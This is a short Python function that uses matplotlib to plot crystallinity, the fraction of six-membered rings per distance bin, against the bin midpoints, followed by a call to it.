def Crystallinity(bin_list, bin_mids):
    """Plot crystallinity (the fraction of six-membered rings) for each
    distance bin in `bin_list` against the bin midpoints `bin_mids`."""
    fractions = [rings.count(6) / len(rings) for rings in bin_list]
    plt.plot(bin_mids, fractions, 'ro')
    plt.axis([0, bin_mids[-1] + 1, 0, 1])
    plt.title('Crystallinity')
    plt.xlabel('Distance')
    plt.ylabel('Crystallinity')
    plt.show()
Crystallinity(bin_list, bin_mids) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.